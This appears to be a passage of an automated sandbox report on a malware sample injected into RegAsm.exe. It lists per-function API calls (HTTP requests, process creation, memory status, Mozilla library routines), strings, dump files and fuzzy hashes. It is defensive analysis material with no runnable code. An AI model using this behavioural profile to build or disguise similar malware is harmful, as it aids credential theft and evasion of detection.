Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9

Function 6C01BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C01BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C01BE8F

Strings

0, xrefs: 6C01BE5B

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: d08a0c72277bcdc735ab3807d90f88ce71e76ed4f8cc028872114370f4cdf71e
Instruction ID: 808e728245693baf8b172c4839e621c20dd82232b38f59b14836032f64191b2e
Opcode Fuzzy Hash: d08a0c72277bcdc735ab3807d90f88ce71e76ed4f8cc028872114370f4cdf71e
Instruction Fuzzy Hash: AC417FB150D745CFC701CFB8C481A9BF7E4AF8A348F008A1DF98597B11E731A9558B82

Function 6C01F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C01F19B

Part of subcall function 6C03D850: EnterCriticalSection.KERNEL32(?), ref: 6C03D904
Part of subcall function 6C03D850: LeaveCriticalSection.KERNEL32(?), ref: 6C03D971
Part of subcall function 6C03D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C03D97B

mozalloc_abort.MOZGLUE(?), ref: 6C01F209

Strings

d, xrefs: 6C01F1F5

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 2c976746fba67e2ec7e707c504934aa79e7030b80059fbaccdc5093ebb2e0a60
Instruction ID: c3102f16e54408a5fa051019fc011b8a48ef92ef0f515b0ad277821903fcbe01
Opcode Fuzzy Hash: 2c976746fba67e2ec7e707c504934aa79e7030b80059fbaccdc5093ebb2e0a60
Instruction Fuzzy Hash: 2A113032A0574A87DB048F5899513EEF3FDEF96218B115129DD0597A11EF30A984C350

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA

Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00411EF9

Strings

image/jpeg, xrefs: 00411F21

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction ID: 1c9963d8e1bd3712552ddde0994ffc3eb950a7432bc1cc1e62e4a2615aecff81
Opcode Fuzzy Hash: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction Fuzzy Hash: 5A11A572910108FFCB10CFA5CD848DEBB7AFE05361B21026BEA11A21A0D7769E81DA54

Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242

_memmove.LIBCMT ref: 0040F190

Strings

invalid string position, xrefs: 0040F139

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A

Function 6C053CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C053D19
mozalloc_abort.MOZGLUE(?), ref: 6C053D6C

Strings

d, xrefs: 6C053D58

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: e611c4a407c427a1baaad8355af176b4d30e32460b293d365998c37de611e594
Instruction ID: a62319be961a04b8c6a8180ee78bbb5ce002519fb18cc1a62f2d24e5f72a4192
Opcode Fuzzy Hash: e611c4a407c427a1baaad8355af176b4d30e32460b293d365998c37de611e594
Instruction Fuzzy Hash: B0113431E04788D7DF008F69D9146EEB3B5EF9A218B849329EC459B602EF30A594C360

Function 6C024730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0244B2,6C09E21C,6C09F7F8), ref: 6C02473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C02474A

Strings

GetNtLoaderAPI, xrefs: 6C024744

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 4429a183fea494f5d6228dff83543f1402c6632f90529dbce016017a6155efa2
Instruction ID: ffd893928fd1e48ea497955757738f93287dc0b0bb349250bc3e831faac32dd6
Opcode Fuzzy Hash: 4429a183fea494f5d6228dff83543f1402c6632f90529dbce016017a6155efa2
Instruction Fuzzy Hash: 10018C757042189FDF009FA69888B1E7BFDFB8A325B041069EA06C7300CF78D9018F92

Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F35C

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392

Strings

invalid string position, xrefs: 0040F357

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398

Function 004281C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strcpy_s.MSVCRT ref: 004281DE
__invoke_watson.LIBCMT ref: 00428232

Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C

Strings

,NC, xrefs: 0042821D

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_sstrcpy_s
String ID: ,NC
API String ID: 1132195725-1329140791
Opcode ID: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction ID: d9baa1639a8d6cddfa45c7016c3352d2dd6dfe7468836747954bbe6ada87296f
Opcode Fuzzy Hash: 53b9d3399cf01edd424f01e545b4bf6b1a8555bf483cd13445593f0413521323
Instruction Fuzzy Hash: 96F02872641228BFCF116FA0EC42EEF3F59AF00350F44806AF91955151DB369D54C764

Function 0042806D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcat_s.LIBCMT ref: 0042808C
__invoke_watson.LIBCMT ref: 004280A8

Strings

`8C, xrefs: 0042807E, 00428084

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s
String ID: `8C
API String ID: 228796091-1339866851
Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction ID: b7dcb7c8242e45e9edc672ca800bd55fb05ba849de6ed2c4d9e7ea01795509d3
Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
Instruction Fuzzy Hash: 42E09273600219ABDF101E66EC4189F771AFF80368B46043AFE1852102D63599A69698

Function 6C076DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C076E22
__Init_thread_footer.LIBCMT ref: 6C076E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C076E1D

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 6c98dfb8f5fd375fc5aba989d0d0002f99ed7ef95d3f2b673e63ab9ee464583d
Instruction ID: 9e89b4dbe2df213fe151839ba99951862647415f45c7856c0ea91de8d95b9561
Opcode Fuzzy Hash: 6c98dfb8f5fd375fc5aba989d0d0002f99ed7ef95d3f2b673e63ab9ee464583d
Instruction Fuzzy Hash: 80F02432604340CBDE108F68C850B9637FD7303218F342175E84647B91CBA0B906CAB7

Function 6C029E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C029EEF

Strings

NaN, xrefs: 6C029EC1
Infinity, xrefs: 6C029EB7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: cf1db7b31c02b72ffb800d6611a4a3f0eb044190687e5a6a7fa47bc150124281
Instruction ID: 33b38d52059e82860bbc384f6bb79b05a33f03646673f04ef38853e818860a15
Opcode Fuzzy Hash: cf1db7b31c02b72ffb800d6611a4a3f0eb044190687e5a6a7fa47bc150124281
Instruction Fuzzy Hash: A3F03C7170A241CAEF008F18D84579133FBB74771DF306A29E9540AAA1DB7965568AC2

Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041F3F0
DName::DName.LIBCMT ref: 0041F3FC

Strings

{flat}, xrefs: 0041F3EB

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99

Function 6C075900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C0951C8), ref: 6C07591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C07592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C075915

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 523698642544d7890239e07fc849915554c7d8bdce836374be8b8b4115b42b27
Instruction ID: 0cf52e56884f543b53d2a9017eaccde841370b6ba7d64a06a485fb70fb8d6a23
Opcode Fuzzy Hash: 523698642544d7890239e07fc849915554c7d8bdce836374be8b8b4115b42b27
Instruction Fuzzy Hash: 3CE04F34205240FBDB205F69C9087957FFCBB1373AF149649F5A993AD1CBB5A84087A2

Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401436
GlobalMemoryStatusEx.KERNEL32(?), ref: 00401449

Strings

@, xrefs: 00401442

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

